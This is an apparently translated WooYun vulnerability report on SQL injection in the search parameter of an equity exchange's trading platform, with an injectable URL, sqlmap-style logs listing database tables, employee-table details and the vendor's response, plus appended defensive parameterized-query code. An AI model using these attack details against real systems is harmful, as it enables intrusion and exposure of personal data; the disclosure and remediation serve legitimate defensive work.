Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0150104

Title: SQL injection in Wutong Xiaowei (Qianhai Equity Exchange, 前海股权交易中心) leads to information disclosure

Vendor: Qianhai Equity Exchange (前海股权交易中心)

Author: ksss

Submitted: 2015-10-28 18:07

Fixed: 2015-12-17 10:14

Published: 2015-12-17 10:14

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (Guangdong Information Security Evaluation Center, 广东省信息安全测评中心) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-10-28: Details sent to the vendor, awaiting vendor handling
2015-11-02: Vendor confirmed; details disclosed to the vendor only
2015-11-12: Details disclosed to core white hats and domain experts
2015-11-22: Details disclosed to regular white hats
2015-12-02: Details disclosed to intern white hats
2015-12-17: Details disclosed to the public

Brief description:

In someone's words, "nearly 50 billion yuan is involved".

Detailed description:

https://**.**.**.**/node/stock-market/plaza/sell


[Screenshot: QQ截图20151028145558.png]


http://**.**.**.**/bugs/wooyun-2010-0139659 - the account table already exposed by an injection on the main site in that report is hit again here.
The Qianhai Equity Exchange trading platform has SQL injection in its search function; the captured request is:

https://**.**.**.**/node/stock-market/plaza/sell?ent_name=123


[Screenshot: QQ截图20151028145752.png]


The current database has over 300 tables.

[Screenshot: QQ截图20151028145850.png]


back-end DBMS: MySQL 5.0.11
select count(*) from account: '464'
select * from account limit 0,1: '序号, 邮箱, 部门, 职务/职责, 姓名, 联系电话, 座机, 当前状态, 工号, 邮箱'


The first table, account, stores detailed information on more than 400 employees, including name, position, employee ID and so on.
The remaining tables hold a huge amount of data; for example qhee_ent_apply_listed_stock_holder contains 18,000 shareholding records, including names, equity details and so on.
There are also other user accounts, transaction details and more; the amount of information is enormous.

[Screenshot: QQ截图20151028150145.png]


[11:07:12] [INFO] resumed: qhee_activity_mutiladdress
[11:07:12] [INFO] resumed: qhee_activity_speecher
[11:07:12] [INFO] resumed: qhee_admin_log
[11:07:12] [INFO] resumed: qhee_admin_permission
[11:07:12] [INFO] resumed: qhee_admin_power
[11:07:12] [INFO] resumed: qhee_admin_roles
[11:07:12] [INFO] resumed: qhee_admin_user_role_relations
[11:07:12] [INFO] resumed: qhee_api_logs
[11:07:12] [INFO] resumed: qhee_article_tag_map
[11:07:12] [INFO] resumed: qhee_buzz_statistics
[11:07:12] [INFO] resumed: qhee_cert_info
[11:07:12] [INFO] resumed: qhee_code_equity
[11:07:12] [INFO] resumed: qhee_code_equity_copy_0823
[11:07:12] [INFO] resumed: qhee_code_equity_copy_0930
[11:07:12] [INFO] resumed: qhee_com_custom
[11:07:12] [INFO] resumed: qhee_com_dljz_base
[11:07:13] [INFO] resumed: qhee_com_employee
[11:07:13] [INFO] resumed: qhee_com_gszc_base
[11:07:13] [INFO] resumed: qhee_com_gszc_stock_holder
[11:07:13] [INFO] resumed: qhee_com_order
[11:07:13] [INFO] resumed: qhee_com_pack_product
[11:07:13] [INFO] resumed: qhee_com_product
[11:07:13] [INFO] resumed: qhee_com_services
[11:07:13] [INFO] resumed: qhee_common_comment
[11:07:13] [INFO] resumed: qhee_cooperation_invest_org
[11:07:13] [INFO] resumed: qhee_demand_products
[11:07:13] [INFO] resumed: qhee_ent
[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_base
[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_block
[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_files
[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_files_back
[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_financial
[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_holder
[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_init
[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_more_block
[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_more_pledge
[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_person_manage
[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_pledge
[11:07:13] [INFO] resumed: qhee_ent_apply_files_back
[11:07:13] [INFO] resumed: qhee_ent_apply_history
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_base
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_base_20150604
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_base_20150608
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_base_20151028
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_base_bak20140717
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_base_tnp
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_display
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_files
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_files_tmp
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_financial
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_financial_tmp
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_init
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_stat
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_stock
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_stock_holder
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_stock_holder_20140821
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_stock_holder_tmp
[11:07:13] [INFO] resumed: qhee_ent_apply_register_101b
[11:07:13] [INFO] resuming partial value: qhee_ent_apply_
[11:16:40] [INFO] retrieved: qhee_ent_call_api_history
[11:26:23] [INFO] retrieved: qhee_ent_disseminates
[11:33:37] [INFO] retrieved: qhee_ent_disseminates_20141021
[11:40:24] [INFO] retrieved: qhee_ent_disseminates_20150522
[11:45:41] [INFO] retrieved: qhee_ent_disseminates_201505221249
[11:50:52] [INFO] retrieved: qhee_ent_edit_reject_history
[12:02:15] [INFO] retrieved: qhee_ent
[12:03:39] [ERROR] invalid character detected. retrying..
[12:03:39] [WARNING] increasing time delay to 4 seconds
_edit_verify_status
[12:14:02] [INFO] retrieved: qhee_ent_edit_verify_status_20150918
[12:21:39] [INFO] retrieved: qhee_ent_edit_verify_status_copy_0820
[12:30:03] [INFO] retrieved: qhee_ent_final
[12:33:49] [INFO] retrieved: qhee_ent_final_20140821
[12:40:11] [INFO] retrieved: qhee_ent_final_2014_0923
[12:45:02] [INFO] retrieved: qhee_ent_final_20150604
[12:49:53] [INFO] retrieved: qhee_ent_final_20150608
[12:53:04] [INFO] retrieved: qhee_ent_final_20150609
[12:56:05] [INFO] retrieved: qhee_ent_final_copy_20140114
[13:04:40] [INFO] retrieved: qhee_ent_news
[13:08:03] [INFO] retrieved: qhee_ent_option_state
[13:15:59] [INFO] retrieved: qhee_ent_patent
[13:20:31] [INFO] retrieved: qhee_ent_patent_20

Proof of vulnerability:

[Screenshot: QQ截图20151028145752.png]

[Screenshot: QQ截图20151028150145.png]

Remediation:

Filter the input.
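As an added illustration of why this remediation matters (this is example code, not part of the original report and not the exchange's own code): the defect class is a search value being concatenated into the SQL text, so a quote character in the value is parsed as SQL syntax. The hardened form binds the value as a parameter and escapes LIKE wildcards, so quotes and keywords remain data. The table name `listing`, its columns, the sample rows and the use of an in-memory SQLite database in place of the MySQL backend named in the report are all assumptions made for this example.

```python
import sqlite3

# Constructed sample data standing in for the ent_name search on the
# stock-market "sell" listing. Table name and columns are assumptions.
SAMPLE_ROWS = [
    ("Alpha Holdings", "SZ-0001"),
    ("O'Reilly Ltd", "SZ-0002"),
    ("Beta Capital", "SZ-0003"),
]


def build_db() -> sqlite3.Connection:
    """In-memory SQLite stand-in for the MySQL backend in the report."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE listing (ent_name TEXT, code TEXT)")
    conn.executemany("INSERT INTO listing VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_search(conn: sqlite3.Connection, ent_name: str) -> list:
    """Concatenation: the user value becomes part of the SQL text.

    A quote in the value terminates the string literal early and the rest
    is parsed as SQL. This is the defect class the report describes."""
    sql = ("SELECT ent_name, code FROM listing "
           "WHERE ent_name LIKE '%" + ent_name + "%'")
    return conn.execute(sql).fetchall()


def concatenation_breaks_on_quote(conn: sqlite3.Connection, value: str) -> bool:
    """Defender-side check: does the concatenated query fail to parse?

    An error on ordinary data containing an apostrophe is the same signal
    an attacker reads as proof that input reaches the SQL parser."""
    try:
        vulnerable_search(conn, value)
    except sqlite3.OperationalError:
        return True
    return False


def safe_search(conn: sqlite3.Connection, ent_name: str) -> list:
    """Bound parameter plus LIKE-wildcard escaping.

    The driver sends the value separately from the statement, so quotes
    and keywords in it can never alter the query. % and _ are escaped so
    a user cannot turn the search into a match-everything pattern."""
    escaped = (ent_name.replace("\\", "\\\\")
                       .replace("%", "\\%")
                       .replace("_", "\\_"))
    sql = ("SELECT ent_name, code FROM listing "
           "WHERE ent_name LIKE ? ESCAPE '\\'")
    return conn.execute(sql, ("%" + escaped + "%",)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("legit name breaks concatenated query:",
          concatenation_breaks_on_quote(db, "O'Reilly"))
    print("parameterized search:", safe_search(db, "O'Reilly"))
    print("wildcard treated as literal:", safe_search(db, "%"))
```

The practical point for the fix: "filtering" the value (stripping or blocking characters) is fragile, because the legitimate name O'Reilly Ltd already contains the character a filter would have to remove; parameterization keeps such data searchable while removing the injection entirely. The wildcard escaping is the extra step practitioners forget with LIKE, since a bound parameter alone still lets `%` match every row.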

Copyright notice: please credit the source when reposting: ksss@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-11-02 10:13

Vendor reply:

Thank you very much for your report.
The issue in the report has been confirmed and reproduced.
Affected data: High
Attack cost: Low
Impact: High
Overall rating: High, rank: 10
We are contacting the relevant site administration unit for handling.

Latest status:

None yet


Vulnerability rating:
